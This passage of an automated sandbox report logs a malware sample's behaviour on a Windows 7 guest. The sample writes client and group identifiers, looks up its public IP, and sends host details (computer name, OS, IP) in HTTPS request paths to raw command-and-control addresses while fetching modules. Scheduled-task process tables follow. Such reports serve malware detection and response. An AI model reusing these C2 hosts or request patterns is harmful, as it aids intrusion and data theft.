File	Create	filename = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\client_id, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
System	Get Computer Name	result_out = AUFDDCNTXWT	1	Fn
File	Create	filename = client_id, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
File	Write	filename = client_id, size = 106	1	Fn Data
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
System	Get Time	type = Ticks, time = 140884	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = myexternalip.com, server_port = 0	1	Fn
Inet	Open HTTP Request	http_verb = GET, target_resource = /raw, accept_types = 0	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = myexternalip.com/raw	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4	1	Fn Data
Inet	Read Response	size = 14, size_out = 14	1	Fn Data
Inet	Close Session		1	Fn
Inet	Close Session		1	Fn
Inet	Close Session		1	Fn
COM	Create	interface = 2933BF81-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER	3	Fn
File	Create	filename = config.conf, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Create	filename = group_tag, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
File	Create	filename = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\group_tag, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
File	Create	filename = group_tag, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
File	Write	filename = group_tag, size = 12	1	Fn Data
System	Get Info	type = Operating System	1	Fn
File	Create	filename = client_id, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
File	Read	filename = client_id, size = 106, size_out = 106	1	Fn Data
Inet	Open Connection	protocol = HTTP, server_name = 89.231.13.38, server_port = 449	1	Fn
Inet	Open HTTP Request	http_verb = GET, target_resource = /kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4	1	Fn Data
Inet	Read Response	size = 224, size_out = 224	1	Fn Data
COM	Create	interface = 2933BF81-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Info	type = Operating System	1	Fn
Inet	Close Session		1	Fn
Inet	Open HTTP Request	http_verb = GET, target_resource = /kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4	1	Fn Data
Inet	Read Response	size = 537, size_out = 537	1	Fn Data
System	Get Info	type = Operating System	1	Fn
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Get Info	filename = Modules\, type = file_attributes	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Create	filename = client_id, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 212.38.166.20, server_port = 447	1	Fn
Inet	Open HTTP Request	http_verb = GET, target_resource = /kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 212.38.166.20/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/	1	Fn
Inet	Close Session		1	Fn
System	Sleep	duration = 20000 milliseconds (20.000 seconds)	1	Fn

Thread 0x938

(Host: 1, Network: 0)

Category	Operation	Information	Success	Count	Logfile
System	Sleep	duration = 1000 milliseconds (1.000 seconds)		36	Fn

Process #9: taskeng.exe

Information	Value
ID	#9
File Name	c:\windows\system32\taskeng.exe
Command Line	taskeng.exe {CFDCF914-63AE-4446-B16F-E0A62E2EE661} S-1-5-21-1836691140-625943148-109919340-1000:AUFDDCNTXWT\aDU0VK IWA5kLS:Interactive:LUA[1]
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:49, Reason: Created Scheduled Job
Unmonitor	End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration	00:00:37
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x2b4
Parent PID	0x354 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	AUFDDCNTXWT\aDU0VK IWA5kLS
Groups	AUFDDCNTXWT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000103d4 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x AE0 0x 114 0x 578 0x 464 0x 438 0x 454

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000030000	0x00030000	0x000affff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000000b0000	0x000b0000	0x000b3fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c0fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x000d0000	0x00136fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000140000	0x00140000	0x00141fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000150000	0x00150000	0x0015ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000160000	0x00160000	0x00160fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000170000	0x00170000	0x0026ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000270000	0x00270000	0x0036ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000370000	0x00370000	0x004f7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000500000	0x00500000	0x00680fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000690000	0x00690000	0x01a8ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001a90000	0x01a90000	0x01e82fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001e90000	0x01e90000	0x01e90fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001ea0000	0x01ea0000	0x01ea0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001ec0000	0x01ec0000	0x01f3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f80000	0x01f80000	0x01ffffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002020000	0x02020000	0x0209ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000020a0000	0x020a0000	0x0219ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000021a0000	0x021a0000	0x0227efff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x02320000	0x025eefff	Memory Mapped File	Readable	Region Actions
private_0x0000000002680000	0x02680000	0x026fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002770000	0x02770000	0x027effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002940000	0x02940000	0x029bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000029f0000	0x029f0000	0x02a6ffff	Private Memory	Readable, Writable	Region Actions
kernel32.dll	0x77320000	0x7743efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77440000	0x77539fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77540000	0x776e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
taskeng.exe	0xffe30000	0xffea3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
tschannel.dll	0x7fef6130000	0x7fef6138fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x7fefaec0000	0x7fefaed7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x7fefb2a0000	0x7fefb2f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
xmllite.dll	0x7fefb380000	0x7fefb3b4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ktmw32.dll	0x7fefb3c0000	0x7fefb3c9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x7fefca60000	0x7fefcaa6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x7fefceb0000	0x7fefcec6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wevtapi.dll	0x7fefcfb0000	0x7fefd01cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x7fefd350000	0x7fefd374fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x7fefd380000	0x7fefd38efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x7fefd470000	0x7fefd483fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd680000	0x7fefd6eafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7fefd860000	0x7fefd98cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x7fefd990000	0x7fefda28fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefda30000	0x7fefda5dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7fefdb00000	0x7fefdbdafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefdd60000	0x7fefddc6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefddd0000	0x7fefded8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefdee0000	0x7fefdfa8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefed40000	0x7fefeddefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x7fefede0000	0x7fefefe2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7feff2b0000	0x7feff320fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7feff330000	0x7feff33dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7feff5b0000	0x7feff5cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x7feff5d0000	0x7feff6a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff860000	0x7feff860fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd4fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd5000	0x7fffffd5000	0x7fffffd6fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd7000	0x7fffffd7000	0x7fffffd8fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd9000	0x7fffffd9000	0x7fffffdafff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffdb000	0x7fffffdb000	0x7fffffdcfff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions

Process #10: taskeng.exe

Information	Value
ID	#10
File Name	c:\windows\system32\taskeng.exe
Command Line	taskeng.exe {B729E5EE-8B96-46ED-936E-18C18B0189B1} S-1-5-21-1836691140-625943148-109919340-1000:AUFDDCNTXWT\aDU0VK IWA5kLS:Interactive:Highest[1]
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:49, Reason: Created Scheduled Job
Unmonitor	End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration	00:00:37
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x7d0
Parent PID	0x354 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	AUFDDCNTXWT\aDU0VK IWA5kLS
Groups	AUFDDCNTXWT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000103d4 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x AE4 0x 7F0 0x 7EC 0x 7E0 0x 7D8 0x 7D4

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000000f0000	0x000f0000	0x000f0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000150000	0x00150000	0x001cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001d0000	0x001d0000	0x002cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002e0000	0x002e0000	0x002effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000350000	0x00350000	0x0044ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000450000	0x00450000	0x005d7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000005e0000	0x005e0000	0x00760fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000770000	0x00770000	0x01b6ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001b70000	0x01b70000	0x01f62fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002010000	0x02010000	0x0208ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000020a0000	0x020a0000	0x0211ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002130000	0x02130000	0x021affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000021c0000	0x021c0000	0x0223ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002240000	0x02240000	0x0233ffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x02480000	0x0274efff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000002750000	0x02750000	0x0282efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002830000	0x02830000	0x028affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000029b0000	0x029b0000	0x02a2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002a60000	0x02a60000	0x02adffff	Private Memory	Readable, Writable	Region Actions
kernel32.dll	0x77320000	0x7743efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77440000	0x77539fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77540000	0x776e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
taskeng.exe	0xffe30000	0xffea3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
tschannel.dll	0x7fef6130000	0x7fef6138fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x7fefaec0000	0x7fefaed7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x7fefb2a0000	0x7fefb2f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
xmllite.dll	0x7fefb380000	0x7fefb3b4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ktmw32.dll	0x7fefb3c0000	0x7fefb3c9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x7fefca60000	0x7fefcaa6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x7fefceb0000	0x7fefcec6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wevtapi.dll	0x7fefcfb0000	0x7fefd01cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x7fefd350000	0x7fefd374fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x7fefd380000	0x7fefd38efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x7fefd470000	0x7fefd483fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd680000	0x7fefd6eafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7fefd860000	0x7fefd98cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x7fefd990000	0x7fefda28fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefda30000	0x7fefda5dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7fefdb00000	0x7fefdbdafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefdd60000	0x7fefddc6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefddd0000	0x7fefded8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefdee0000	0x7fefdfa8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefed40000	0x7fefeddefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x7fefede0000	0x7fefefe2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7feff2b0000	0x7feff320fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7feff330000	0x7feff33dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7feff5b0000	0x7feff5cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x7feff5d0000	0x7feff6a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff860000	0x7feff860fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd4fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd5000	0x7fffffd5000	0x7fffffd5fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd6000	0x7fffffd6000	0x7fffffd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffd8000	0x7fffffd8000	0x7fffffd9fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffda000	0x7fffffda000	0x7fffffdbfff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffdc000	0x7fffffdc000	0x7fffffddfff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions

Process #11: taskeng.exe

Information	Value
ID	#11
File Name	c:\windows\system32\taskeng.exe
Command Line	taskeng.exe {33F40472-7093-4C44-9E45-95E720A6D75F} S-1-5-18:NT AUTHORITY\System:Service:
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:49, Reason: Created Scheduled Job
Unmonitor	End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration	00:00:37
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x5c8
Parent PID	0x354 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Groups	Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\SERVICE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT SERVICE\BDESVC (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\BITS (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\CertPropSvc (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\EapHost (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\hkmsvc (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\IKEEXT (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\iphlpsvc (ENABLED_BY_DEFAULT, ENABLED, OWNER) NT SERVICE\LanmanServer (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\MMCSS (ENABLED_BY_DEFAULT, ENABLED, OWNER) NT SERVICE\MSiSCSI (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\RasAuto (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\RasMan (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\RemoteAccess (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\Schedule (ENABLED_BY_DEFAULT, ENABLED, OWNER) NT SERVICE\SCPolicySvc (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\SENS (ENABLED_BY_DEFAULT, ENABLED, OWNER) NT SERVICE\SessionEnv (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\SharedAccess (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\ShellHWDetection (ENABLED_BY_DEFAULT, ENABLED, OWNER) NT SERVICE\wercplsupport (ENABLED_BY_DEFAULT, OWNER) NT SERVICE\Winmgmt (ENABLED_BY_DEFAULT, ENABLED, OWNER) NT SERVICE\wuauserv (ENABLED_BY_DEFAULT, OWNER) NT AUTHORITY\Logon Session 00000000:0000b229 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (ENABLED_BY_DEFAULT, ENABLED, OWNER)
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x AE8 0x 7C8 0x 7C4 0x 7B8 0x 7A8 0x 5CC

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000030000	0x00030000	0x000affff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000000b0000	0x000b0000	0x000b3fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000100000	0x00100000	0x001fffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00200000	0x00266fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000270000	0x00270000	0x0036ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000370000	0x00370000	0x004f7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000500000	0x00500000	0x00680fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000690000	0x00690000	0x0074ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000750000	0x00750000	0x00b42fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000b50000	0x00b50000	0x00b50fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000b60000	0x00b60000	0x00c5ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000c60000	0x00c60000	0x00c60fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000ca0000	0x00ca0000	0x00d1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000d50000	0x00d50000	0x00dcffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000e30000	0x00e30000	0x00eaffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000f70000	0x00f70000	0x00feffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001020000	0x01020000	0x0109ffff	Private Memory	Readable, Writable	Region Actions
